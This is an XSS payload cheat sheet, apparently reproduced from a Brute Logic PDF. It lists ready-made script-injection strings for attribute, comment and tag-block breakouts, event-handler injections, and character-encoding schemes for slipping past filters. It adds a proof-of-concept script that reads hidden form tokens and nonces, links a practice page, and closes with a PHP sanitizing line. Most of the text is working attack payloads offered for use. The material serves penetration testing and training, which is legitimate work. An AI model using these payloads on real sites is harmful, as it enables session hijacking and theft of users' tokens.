xss payload

XSS-Cheat-Sheet链接:
https://brutelogic.com.br/blog/wp-content/uploads/2021/09/Brute-XSS-Cheat-Sheet-Sample.pdf

1. Simple HTML Injection
Use when input lands inside an attribute’s value outside tag except the ones described in next case.

<svg onload=alert(1)>
<script>alert(1)</script>



2. Simple HTML Injection – Attribute Breakout
Use when input lands inside an attribute’s value of an HTML tag or outside tag except the ones described in the “Tag Block Breakout” case below.

"><svg onload=alert(1)>
"><script>alert(1)</script>



3. Simple HTML Injection – Comments Breakout
Use when input lands inside comments section (between ) of HTML document.

--><svg onload=alert(1)>
--><script>alert(1)</script>



4. Simple HTML Injection – Tag Block Breakout
Use when input lands inside or between opening/closing of some tags like
title, style, script, iframe, noscript and textarea, respectively .

</title><svg onload=alert(1)>
 </style><svg onload=alert(1)>
 </script><svg onload=alert(1)>
 </iframe><svg onload=alert(1)>
 </noscript><svg onload=alert(1)>
 </textarea><svg onload=alert(1)>



5. HTML Injection - Inline
Use when input lands inside an attribute’s value of an HTML tag but that tag can’t be terminated by greater than sign (>).

"onmouseover="alert(1)
"onmouseover=alert(1)//
"autofocus onfocus="alert(1)
"autofocus onfocus=alert(1)//



6. HTML Injection - Vector Schemes
The following schemes shows all chars and bytes allowed as separators or valid syntax. “ENT” means HTML ENTITY and it means that any of the allowed chars or bytes can be used in their HTML entity forms (string and numeric). Notice the “javascript” word might have some bytes in between or not and all
of its characters can also be URL or HTML encoded.

Vector Scheme 1 (tag name + handler)
<svg[1]onload[2]=[3]alert(1)[4]>
[1]: SPACE, +, /, %09, %0A, %0C,%0D, %20, %2F
[2]: SPACE, +, %09, %0A, %0C,%0D, %20
[3]: SPACE, +, ", ', %09, %0A, %0B, %0C,%0D, %20, %22, %27,
[4]: SPACE, +, ", ', %09, %0A, %0B, %0C,%0D, %20, %22, %27

Vector Scheme 2 (tag name + attribute + handler)
<img[1]src[2]=[3]k[4]onerror[5]=[6]alert(1)[7]>
[1]: SPACE, +, /, %09, %0A, %0C,%0D, %20, %2F
[2]: SPACE, +, %09, %0A, %0C,%0D, %20
[3]: SPACE, +, ", ', %09, %0A, %0C,%0D, %20, %22, %27
[4]: SPACE, +, ", ', %09, %0A, %0C,%0D, %20, %22, %27
[5]: SPACE, +, %09, %0A, %0C,%0D, %20
[6]: SPACE, +, ", ', %09, %0A, %0B, %0C,%0D, %20, %22, %27
[7]: SPACE, +, ", ', %09, %0A, %0B, %0C,%0D, %20, %22, %27

Vector Scheme 3 (tag name + href|src|data|action|formaction)
The [?], [4] and [5] fields can only be used if [3] and [6] are single or double
quotes.
<a[1]href[2]=[3]javas[?]cript[4]:[5]alert(1)[6]>
[1]: SPACE, +, /, %09, %0A, %0C,%0D, %20, %2F
[2]: SPACE, +, %09, %0A, %0C,%0D, %20
[3]: SPACE, +, ", ', [%01 - %0F], [%10 - %1F], %20, %22, %27, ENT
[?]: %09, %0A, %0D, ENT
[4]: %09, %0A, %0D, ENT
[5]: SPACE, +, %09, %0A, %0B, %0C,%0D, %20
[6]: SPACE, +, ", ', %09, %0A, %0B, %0C,%0D, %20, %22, %27

7. Alternative PoC - Shake Your Body
Use to shake all the visible elements of the page as a good visualization of the vulnerability.
setInterval(k=>{b=document.body.style,b.marginTop=(b.marginTop=='4px')?'-4px':'4px';},5)

8. Alternative PoC - Alert Hidden Values
Use to prove that all hidden HTML values like tokens and nonces in target
page can be stolen.
f=document.forms;for(i=0;i<f.length;i++){e=f[i].elements;
for(n in e){if(e[n].type=='hidden'){alert(e[n].name+': '+e[n].value)}}}

9. XSS Online Test Page
Use to practice XSS vectors and payloads. Check source code for injection
points.
https://brutelogic.com.br/gym.php

10. PHP Sanitizing for Source-based XSS
Use to prevent XSS in every context as long as input does not reflect in nondelimited strings or eval-like function (all those in JS context). It does not
prevent against DOM-based XSS, it sanitizes HTMLi (string breakout, markup
and browser schemes) and JSi (string breakout and placeholders for template
literals).
$input = preg_replace("/:|\\\$|\\\/", "", htmlentities($_REQUEST["param"], ENT_QUOTES));